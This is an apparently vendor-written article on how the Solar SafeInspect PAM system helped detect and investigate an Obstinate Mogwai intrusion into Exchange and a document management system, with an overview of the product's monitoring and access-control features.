Incident response XXII века: как PAM-система помогла выявить атаку в прямом эфире

Initially, Privileged Access Management (PAM) systems were created to control the actions of users with elevated privileges. Over time, it became clear that they help investigate Trusted Relationship attacks and incidents caused by employees and insiders. For example, in 2024, contractors became the "entry point" for 8% of successful cyberattacks.
Therefore, auditors, provider employees, contractors servicing IT systems require the same attention as privileged users. To comply with security requirements, they cannot be granted the same rights as regular employees, but the PAM system helps keep them in sight. In this material, we will detail a case and the role of the PAM system in combating hackers.

What is known about the attackers

Obstinate Mogwai is a highly professional, presumably state-sponsored hacker group from East Asia. These attackers engage in cyber espionage and geopolitical intelligence in Russia and neighboring regions. They got their name for the persistence with which they try to re-enter systems even after detection and blocking.

The group's activity has been traced since 2023. Obstinate Mogwai attacks government institutions, IT companies, and their contractors, often exploiting vulnerabilities in public systems, Exchange servers, and compromised contractor credentials. To gain a foothold, the group often uses methods such as .NET deserialization attacks. Their toolkit includes well-known malware such as KingOfHearts and TrochilusRAT, as well as special backdoors like Donnect and DimanoRAT.

Obstinate Mogwai uses legitimate accounts and certificates, privileged accounts, and contractor data. One of their goals is to penetrate electronic document management systems. A characteristic feature is manual work with confidential documents during intrusions.

How we detected the attack

Solar specialists saw traces of the attackers in IIS events coming
to SIEM. Various GET and POST requests to owa /owa/auth/logon.aspx resources were recorded in them. The requests came from an address that was already known as a confirmed indicator of compromise. The requests were made under one user's certificate to another user's account data. Detection of these events automatically triggered an investigation.

The attackers sought to take over Exchange. Presumably, they wanted to gain a foothold
in the infrastructure and develop the attack using .Net deserialization. As noted above, this is typical behavior of the "obstinate demon".

Other targets were various employee systems from which the attackers tried to obtain confidential documents and other valuable information. The group was also interested in terminal servers for access to electronic document management.

Incident response of the XXII century — this is how you can call the part of the investigation that established the fact of the attackers' access to sensitive data. This happened thanks to the PAM system Solar SafeInspect, installed in the customer's infrastructure. This system automatically records privileged user sessions, allowing client administrators to monitor their activity. That is why all actions (which, by the way, were performed at night) were recorded. Viewing this blockbuster revealed that the attackers are very familiar with the interface of the not-so-simple electronic document management system. They were interested in various documents related to several Asian countries. Interestingly, the attackers viewed the opened documents page by page, lingering on each page for a few seconds. Most likely, during these pauses, they took screenshots or recorded the screen.

How the PAM system helps to repel cyberattacks

Solar SafeInspect has a whole set of features that help to understand such scenarios. For example, the system allows detecting the launch of commands and applications from the blacklist. In this case, the system can terminate the session or notify the administrator. In the case of an SSH connection, the sending of a command is tracked: launching shell commands, copying files, etc. When connecting via RDP, as it was in the attack we are considering, by the window title inside the RDP session. The configuration is done through policies that directly allow or prohibit certain actions.

For example, we know that this user never launches Word because his work is not related to texts, or he only accesses a limited list of servers. If someone tries to open Word on his machine, the action will be blocked, and the administrator will be notified.

It is possible to integrate via syslog with SIEM, via ICAP — DLP, antivirus, and other security infrastructure elements. Thus, the PAM solution becomes a source of data about events on the user's workstation, capable of detecting the download of malware or the upload of confidential information and controlling the clipboard.

The company can track chains of events, for example, an atypical login to the workstation, followed by authorization on a specific server, and an attempt to download information. This significantly simplifies the work of incident investigation specialists, who can prepare correlation rules for a variety of cases.

To avoid the risk of compromising passwords to corporate systems, the PAM system can map accounts, allowing employees to authenticate in services using a domain account. It looks like this: the user authenticates with the domain account data with basic privileges, and the PAM system behind the scenes substitutes a privileged account, knowing its login and password.

The advantage is that the user does not have to remember and enter additional passwords, which means they will not be compromised. To detect the fact of substitution, it is necessary to specifically check which record is actually used for work in the system. This is not so difficult, however, not all attackers will think about it. In any case, he cannot compromise the issued account, try to bypass the PAM protection - he will not have an understanding of his actual capabilities, nor a way to find out the corporate password or other data.

If Solar SafeInspect operates in Router mode, the user does not undergo additional explicit authorization and does not know that his actions are controlled and recorded by the PAM system. Thanks to this, the hacker does not attempt to bypass the protection tool or change his actions to permissible ones, acting openly. When we operate in router mode, the hacker does not see and does not know that he is undergoing explicit authorization.

The last important function of the PAM system in the list was not used in this case, otherwise the attack would not have taken place in principle. But it cannot be ignored, precisely because it is a really powerful option. We are talking about the "Four Eyes" mode, which allows you to protect critically important servers. When this function is enabled, security personnel receive requests for manual authorization of access to corporate systems. The administrator must check the request and its legitimacy, confirm access or deny it.

This is an overview of the technical functions of PAM for detecting and blocking cyber attacks. A more detailed analysis of the case is published in the material "Reign of king: tactics and tools of the Obstinate Mogwai group"